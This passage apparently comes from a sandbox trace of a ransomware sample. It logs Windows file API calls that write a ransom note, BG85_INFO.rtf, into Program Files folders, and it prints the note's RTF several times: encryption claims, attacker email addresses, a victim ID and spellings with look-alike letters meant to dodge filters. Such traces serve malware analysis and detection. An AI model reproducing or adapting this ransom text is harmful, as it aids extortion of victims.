pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\nÔ48Õ>*c\x98¿PËxf]ê\x8ac¤\x1eîJ\x09ÇY5ø}\"\x1f¯·èE\x1e\x1b\x9a®*À\x83èlÁÝ9\x99\x91i\x09\x9dÃø\x06Öå¥{\x9cÚ\x14\\\x7fÀï\x1b\x02\x03¬s\räç\x7f\x99õ c§¾\x9fÞ\x8bØfì¯ÜVËÞÏIîO¾@,nåèJê\x97\x03w\x07Ôr\x87\x13­4×¾\x80B=ÿƨ­DĨÊƶ\x19bonv|ßu5±\x12Qe\x7f\x9a\x8f\x02RùÿÙ¡ÃÀkI>o Ø\x95&Fk\x09²bß\x8a¨n*N\x0c-¶\x07º3_¨42>\x9b§g¶r ê\x91\x02Çy\x98\x1f\x99f±{\r9£", lpUsedDefaultChar=0x0) returned 7247 [0066.597] WriteFile (in: hFile=0x1fc, lpBuffer=0x2668a38*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0066.598] CloseHandle (hObject=0x1fc) returned 1 [0066.599] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\bg85_info.rtf")) returned 0xffffffff [0066.599] GetLastError () returned 0x2 [0066.599] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0066.723] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0066.723] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 